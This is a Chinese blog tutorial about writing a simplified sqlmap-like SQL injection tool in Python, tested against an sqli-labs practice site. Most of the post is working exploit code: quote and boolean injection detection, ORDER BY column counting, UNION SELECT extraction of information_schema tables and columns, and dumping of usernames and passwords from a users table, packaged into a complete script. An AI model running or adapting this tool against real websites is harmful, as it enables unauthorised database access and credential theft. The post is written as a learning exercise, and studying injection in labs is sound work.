网络安全初入茅庐 --- 简易 sqlmap 制作

187 阅读7分钟

文章内容过长,文末准备啦小福利希望大家喜欢

前景提要

学习网络安全有一段时间了,用惯了其他人编写的工具,决心自己写一个入门级别比较简单的小工具自己使用练习。

运行演示

  1. 进入一个 sqli-lab 的靶场当作测试网站。
![网络安全初入茅庐 --- 简易 sqlmap 制作](https://p6-tt.byteimg.com/large/pgc-image/38848ebcda6b48f282ebc31c6d82f896?from=pc)

2.获取其 url 地址:96e2b87c-897e-3af7-bdc1-fdfea8bde004-1.anquanlong.com/Less-1/inde…

3.运行程序

![网络安全初入茅庐 --- 简易 sqlmap 制作](https://p6-tt.byteimg.com/large/pgc-image/561f5bf618484cb0a0d5a22cc516e17e?from=pc)

代码解析

  1. 首先检测网站是否存在 sql 注入,通过闭合单双引号以及布尔判断检测

    def can_inject(text_url): text_list = ["%27","%22"] for item in text_list: target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+" target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+" result1 = send_request(target_url1) result2 = send_request(target_url2) soup1 = BeautifulSoup(result1,'html.parser') fonts1 = soup1.find_all('font') content1 = str(fonts1[2].text) soup2 = BeautifulSoup(result2,'html.parser') fonts2 = soup2.find_all('font') content2 = str(fonts2[2].text) if content1.find('Login') != -1 and content2 is None or content2.strip() is '': log('使用' + item + "发现数据库漏洞") return True,item else:log('使用' + item + "未发现数据库漏洞") return False,None123456789101112131415161718

  2. 如果检测出存在 sql 注入漏洞的话,通过 order by 检测字段列数

    def text_order_by(url,symbol): flag = 0 for i in range(1,100): log('正在查找字段' + str(i)) text_url = url + symbol + "%20order%20by%20" + str(i) + "--+" result = send_request(text_url) soup = BeautifulSoup(result,'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) if content.find('Login') == -1: log('获取字段成功 -> ' + str(i) + "个字段") flag = i break return flag1234567891011121314

  3. 拿到每个字段后根据 union_select 联合查询检测可视化位置和字段位置

    def text_union_select(url,symbol,flag): prefix_url = get_prefix_url(url) text_url = prefix_url + "=0" + symbol + "%20union%20select%20" for i in range(1,flag): if i == flag - 1:text_url += str(i) + "%20--+" else:text_url += str(i) + "," result = send_request(text_url) soup = BeautifulSoup(result,'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) for i in range(1,flag): if content.find(str(i)) != -1: temp_list = content.split(str(i)) return i,temp_list1234567891011121314

  4. 通过访问网页找到网页内容获取数据库名

    def get_database(url,symbol): text_url = url + symbol + "aaaaaaaaa" result = send_request(text_url) if result.find('MySQL') != -1:return "MySQL" elif result.find('Oracle') != -1:return "Oracle"12345

  5. 获取数据表名

    def get_tables(url,symbol,flag,index,temp_list): prefix_url = get_prefix_url(url) text_url = prefix_url + "=0" +symbol + "%20union%20select%20" for i in range(1,flag): if i == index:text_url += "group_concat(table_name)" + "," elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+" else:text_url += str(i) + "," result = send_request(text_url) soup = BeautifulSoup(result,'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) return content.split(temp_list[0])[1].split(temp_list[1])[0]123456789101112

  6. 获取字段名

    def get_columns(url,symbol,flag,index,temp_list): prefix_url = get_prefix_url(url) text_url = prefix_url + "=0" +symbol + "%20union%20select%20" for i in range(1,flag): if i == index:text_url += "group_concat(column_name)" + "," elif i == flag - 1: text_url += str(i) + "%20from%20information_schema.columns%20where%20" \ "table_name='users'%20and%20table_schema=database()%20--+" else:text_url += str(i) + ',' result = send_request(text_url) soup = BeautifulSoup(result,'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) return content.split(temp_list[0])[1].split(temp_list[1])[0]1234567891011121314

  7. 获取字段内容

    def get_data(url,symbol,flag,index,temp_list): prefix_url = get_prefix_url(url) text_url = prefix_url + "=0" +symbol + "%20union%20select%20" for i in range(1,flag): if i == index:text_url += "group_concat(id,0x3a,username,0x3a,password)" + "," elif i == flag - 1:text_url += str(i) + '%20from%20users%20--+' else:text_url += str(i) + "," result = send_request(text_url) soup = BeautifulSoup(result,'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) return content.split(temp_list[0])[1].split(temp_list[1])[0]123456789101112

  8. 得到每个字段后,循环遍历出字段中的内容在输出位置显示

    datas = get_data(url, symbol, flag, index, temp_list).split(',')temp = columns.split(',')print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))for data in datas: temp = data.split(':') print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))123456

完整代码

### imitate_sqlmap.pyimport time,requestsfrom bs4 import BeautifulSoupdef log(content):    this_time = time.strftime('%H:%M:%S',time.localtime(time.time()))    print("["+str(this_time)+"]" + content)def send_request(url):    res = requests.get(url)    result = str(res.text)    return resultdef can_inject(text_url):    text_list = ["%27","%22"]    for item in text_list:        target_url1 = text_url + str(item) + "%20" + "and%201=1%20--+"        target_url2 = text_url + str(item) + "%20" + "and%201=2%20--+"        result1 = send_request(target_url1)        result2 = send_request(target_url2)        soup1 = BeautifulSoup(result1,'html.parser')        fonts1 = soup1.find_all('font')        content1 = str(fonts1[2].text)        soup2 = BeautifulSoup(result2,'html.parser')        fonts2 = soup2.find_all('font')        content2 = str(fonts2[2].text)        if content1.find('Login') != -1 and content2 is None or content2.strip() is '':            log('使用' + item + "发现数据库漏洞")            return True,item        else:log('使用' + item + "未发现数据库漏洞")    return False,Nonedef text_order_by(url,symbol):    flag = 0    for i in range(1,100):        log('正在查找字段' + str(i))        text_url = url + symbol + "%20order%20by%20" + str(i) + "--+"        result = send_request(text_url)        soup = BeautifulSoup(result,'html.parser')        fonts = soup.find_all('font')        content = str(fonts[2].text)        if content.find('Login') == -1:            log('获取字段成功 -> ' + str(i) + "个字段")            flag = i            break    return flagdef get_prefix_url(url):    splits = url.split('=')    splits.remove(splits[-1])    prefix_url = ''    for item in splits:        prefix_url += str(item)    return prefix_urldef text_union_select(url,symbol,flag):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"    for i in range(1,flag):        if i == flag - 1:text_url += str(i) + "%20--+"        else:text_url += str(i) + ","    result = send_request(text_url)    soup = BeautifulSoup(result,'html.parser')    fonts = soup.find_all('font')    content = str(fonts[2].text)    for i in range(1,flag):        if content.find(str(i)) != -1:            temp_list = content.split(str(i))            return i,temp_listdef exec_function(url,symbol,flag,index,temp_list,function):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" + symbol + "%20union%20select%20"    for i in range(1,flag):        if i == index:text_url += function + ","        elif i == flag - 1:text_url += str(i) + "%20--+"        else:text_url += str(i) + ","    result = send_request(text_url)    soup = BeautifulSoup(result,'html.parser')    fonts = soup.find_all('font')    content = str(fonts[2].text)    return content.split(temp_list[0])[1].split(temp_list[1])[0]    def get_database(url,symbol):    text_url = url + symbol + "aaaaaaaaa"    result = send_request(text_url)    if result.find('MySQL') != -1:return "MySQL"    elif result.find('Oracle') != -1:return "Oracle"def get_tables(url,symbol,flag,index,temp_list):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" +symbol + "%20union%20select%20"    for i in range(1,flag):        if i == index:text_url += "group_concat(table_name)" + ","        elif i == flag - 1:text_url += str(i) + "%20from%20information_schema.tables%20where%20table_schema=database()%20--+"        else:text_url += str(i) + ","    result = send_request(text_url)    soup = BeautifulSoup(result,'html.parser')    fonts = soup.find_all('font')    content = str(fonts[2].text)    return content.split(temp_list[0])[1].split(temp_list[1])[0]def get_columns(url,symbol,flag,index,temp_list):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" +symbol + "%20union%20select%20"    for i in range(1,flag):        if i == index:text_url += "group_concat(column_name)" + ","        elif i == flag - 1:            text_url += str(i) + "%20from%20information_schema.columns%20where%20" \                    "table_name=\'users\'%20and%20table_schema=database()%20--+"        else:text_url += str(i) + ','    result = send_request(text_url)    soup = BeautifulSoup(result,'html.parser')    fonts = soup.find_all('font')    content = str(fonts[2].text)    return content.split(temp_list[0])[1].split(temp_list[1])[0]def get_data(url,symbol,flag,index,temp_list):    prefix_url = get_prefix_url(url)    text_url = prefix_url + "=0" +symbol + "%20union%20select%20"    for i in range(1,flag):        if i == index:text_url += "group_concat(id,0x3a,username,0x3a,password)" + ","        elif i == flag - 1:text_url += str(i) + '%20from%20users%20--+'        else:text_url += str(i) + ","    result = send_request(text_url)    soup = BeautifulSoup(result,'html.parser')    fonts = soup.find_all('font')    content = str(fonts[2].text)    return content.split(temp_list[0])[1].split(temp_list[1])[0]def sqlmap(url):    log('欢迎来到SQL注入工具')    log('正在进行SQL注入')    result,symbol = can_inject(url)    if not result:        log('此网站不存在SQL漏洞,退出SQL注入')        return False    log('此网站存在SQL注入漏洞,请等待')    flag = text_order_by(url,symbol)    index,temp_list = text_union_select(url,symbol,flag)    database = get_database(url,symbol)    version = exec_function(url,symbol,flag,index,temp_list,'version()')    this_database = exec_function(url,symbol,flag,index,temp_list,'database()')    log('当前数据库 -> '+ database.strip() + version.strip())    log('数据库名 -> ' + this_database.strip())    tables = get_tables(url,symbol,flag,index,temp_list)    log('数据表名 -> ' + tables.strip())    columns = get_columns(url,symbol,flag,index,temp_list)    log('数据列 -> ' + columns .strip())    log('试图得到全部列...')    datas = get_data(url, symbol, flag, index, temp_list).split(',')    temp = columns.split(',')    print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))    for data in datas:        temp = data.split(':')        print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2]))123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156

PyPi打包为可执行文件

在 cfg 文件中添加 entry_points 参数即可。entry_points参数为一个imitate_sqlmap通过setuptools注册的一个外部可以直接调用的接口。在imitate_sqlmap的setup.py里注册entry_points如下:

setup(    name='imitate_sqlmap',    entry_points={       'imitate_sqlmap.api.sqlmap':[          'databases=imitate_sqlmap.api.sqlmap.databases:main',           ], )1234567

该 setup() 函数注册了一个 entry_point ,属于 imitate_sqlmap.api.sqlmap.group 。注意,如果多个其它不同的 imitate_sqlmap 利用 imitate_sqlmap.api.sqlmap 来注册 entry_point ,那么我用 imitate_sqlmap.api.sqlmap 来访问 entry_point 时,将会获取所有已注册过的 entry_point。

最后还是希望你们能给我点一波小小的关注。

奉上自己诚挚的爱心

小编个人收集很多Python的学习电子书籍资料及入门视频,无套路免费领取哦

私信“资料”领取

![网络安全初入茅庐 --- 简易 sqlmap 制作](https://p6-tt.byteimg.com/large/pgc-image/e136ffb3561f4ce2ac49a531cf71b74d?from=pc)
![网络安全初入茅庐 --- 简易 sqlmap 制作](https://p1-tt.byteimg.com/large/pgc-image/282d4040fcc3442297d79eded2fd04a8?from=pc)
![网络安全初入茅庐 --- 简易 sqlmap 制作](https://p1-tt.byteimg.com/large/pgc-image/2d5b76bcaaaf4be7b6cf6ff2508578ef?from=pc)